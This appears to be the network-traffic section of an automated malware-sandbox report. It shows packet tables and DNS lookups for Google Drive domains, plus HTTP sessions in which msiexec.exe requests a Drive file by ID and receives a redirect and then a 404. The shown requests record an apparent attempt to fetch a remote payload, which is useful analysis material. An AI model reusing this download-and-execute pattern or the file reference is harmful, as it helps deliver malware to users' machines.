                                                                    Jan 11, 2025 03:09:22.740295887 CET50014443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:22.740372896 CET44350014216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:22.740561008 CET50014443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:22.756088972 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:22.756122112 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:22.756192923 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:22.756383896 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:22.756397009 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.502201080 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.502325058 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.502816916 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.502832890 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.503006935 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.503014088 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.903703928 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.903835058 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.903850079 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.903889894 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.903906107 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.903912067 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.903937101 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.903985977 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.903990984 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.904037952 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.904050112 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:23.904099941 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.904887915 CET50015443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:23.904900074 CET44350015142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:24.046247959 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.046314001 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.046407938 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.046679020 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.046694994 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.695859909 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.696010113 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.696943998 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.697063923 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.698720932 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.698735952 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.699069023 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:24.699131966 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.699460030 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:24.743341923 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:25.075876951 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:25.075973988 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:25.075994015 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:25.076071978 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:25.076108932 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:25.076183081 CET44350016216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:25.076247931 CET50016443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:25.101813078 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.101872921 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:25.101952076 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.102227926 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.102245092 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:25.736895084 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:25.736984015 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.737605095 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.737617016 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:25.737930059 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:25.737936020 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.148937941 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.149004936 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.149038076 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.149068117 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.149085045 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.149085045 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.149141073 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.149909019 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.149925947 CET44350017142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:26.149935961 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.149975061 CET50017443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:26.281408072 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:26.281461000 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:26.281553030 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:26.281830072 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:26.281841993 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.062772989 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.062902927 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.063561916 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.063626051 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.065323114 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.065330029 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.065560102 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.065614939 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.065910101 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.107322931 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.451652050 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.451714039 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.451733112 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.451778889 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.452269077 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.452299118 CET44350018216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:27.452347994 CET50018443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:27.475765944 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:27.475816011 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:27.475934982 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:27.476214886 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:27.476227045 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.113142967 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.113296032 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.113935947 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.113964081 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.114156008 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.114168882 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.517137051 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.517213106 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.517266989 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.517286062 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.517292976 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.517333031 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.518160105 CET50019443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:28.518176079 CET44350019142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:28.655531883 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:28.655590057 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:28.655678988 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:28.655935049 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:28.655956030 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.284539938 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.284643888 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.286851883 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.286948919 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.289201975 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.289218903 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.289470911 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.289525986 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.289943933 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.335330009 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.677665949 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.677918911 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.678062916 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.678112030 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.678303957 CET44350020216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:29.678319931 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.678375006 CET50020443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:29.698513031 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:29.698544025 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:29.698616982 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:29.698868990 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:29.698879004 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.336098909 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.336159945 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.336571932 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.336575985 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.336749077 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.336754084 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.748424053 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.748502016 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.748568058 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.748579025 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.748594999 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.748615980 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.749330997 CET50021443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:30.749345064 CET44350021142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:30.874169111 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:30.874208927 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:30.874288082 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:30.874548912 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:30.874569893 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.527868032 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.527937889 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.528647900 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.528693914 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.530946970 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.530956984 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.531219006 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.531276941 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.531673908 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.579322100 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.835922956 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.836034060 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.836057901 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.836102962 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.836177111 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.836208105 CET44350022216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:31.836256027 CET50022443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:31.914288998 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:31.914315939 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:31.914381027 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:31.914617062 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:31.914624929 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:32.552367926 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:32.552469969 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:32.808753967 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:32.808774948 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:32.809144974 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:32.809149981 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148587942 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148637056 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148675919 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.148688078 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148719072 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.148726940 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.148730993 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148763895 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.148766041 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.148798943 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.242393017 CET50023443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:33.242413998 CET44350023142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:33.452644110 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:33.452687025 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:33.452769041 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:33.453017950 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:33.453032017 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.089463949 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.089591980 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.090219975 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.090296030 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.092251062 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.092261076 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.092490911 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.092549086 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.092830896 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.139327049 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.497229099 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.497308969 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.497334957 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.497421980 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.497560978 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.497594118 CET44350024216.58.206.78192.168.2.6
                                                                    Jan 11, 2025 03:09:34.497646093 CET50024443192.168.2.6216.58.206.78
                                                                    Jan 11, 2025 03:09:34.512423992 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:34.512470961 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:34.512533903 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:34.512898922 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:34.512912989 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.155739069 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.155833006 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.156272888 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.156282902 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.156429052 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.156435013 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.567260981 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.567346096 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.567401886 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.567408085 CET44350025142.250.181.225192.168.2.6
                                                                    Jan 11, 2025 03:09:35.567435026 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.567457914 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.568252087 CET50025443192.168.2.6142.250.181.225
                                                                    Jan 11, 2025 03:09:35.568272114 CET44350025142.250.181.225192.168.2.6
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 11, 2025 03:08:49.125577927 CET5071153192.168.2.61.1.1.1
                                                                    Jan 11, 2025 03:08:49.135037899 CET53507111.1.1.1192.168.2.6
                                                                    Jan 11, 2025 03:08:50.431694984 CET6204953192.168.2.61.1.1.1
                                                                    Jan 11, 2025 03:08:50.438808918 CET53620491.1.1.1192.168.2.6
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 03:08:49.125577927 CET192.168.2.61.1.1.10x83f3Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 03:08:50.431694984 CET192.168.2.61.1.1.10xe5d9Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 11, 2025 03:08:49.135037899 CET1.1.1.1192.168.2.60x83f3No error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                    Jan 11, 2025 03:08:50.438808918 CET1.1.1.1192.168.2.60xe5d9No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                    • drive.google.com
                                                                    • drive.usercontent.google.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.649985216.58.206.78443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:50 UTC216OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    2025-01-11 02:08:50 UTC1920INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:50 GMT
                                                                    Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-uOr9cAEYV67Xko2_xi9Iag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649986142.250.181.225443988C:\Windows\SysWOW64\msiexec.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-11 02:08:51 UTC258OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                    Cache-Control: no-cache
                                                                    Host: drive.usercontent.google.com
                                                                    Connection: Keep-Alive
                                                                    2025-01-11 02:08:51 UTC2218INHTTP/1.1 404 Not Found
                                                                    X-GUploader-UploadID: AFIdbgTYurtJE-J8abv72OPbQC7EpGzekbbDHoqZf86aKBNOVd6j5mPUos2w7Z4qhWNGZBLV
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 11 Jan 2025 02:08:51 GMT
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Content-Security-Policy: script-src 'nonce-H2F3BWaFKNraajirQZouaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Length: 1652
                                                                    Server: UploadServer
                                                                    Set-Cookie: NID=520=iJBwBPcvZYdj_hp1mHHUxyQoU_0YxwGH9aAMpwMpn8Y55auLwhYKEZuTQe2O_-bxgzO4JL8YmgroC791NF6DDRSNGCaPfz6WS_XYw4PKfZjX0cfwtuxt4e9kBZfE_kvV4j0RYkFXCqKaw5GWgs5d02o2wLUA5v_cENQYddWxAMont6XGnmHY7fU; expires=Sun, 13-Jul-2025 02:08:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                    Connection: close
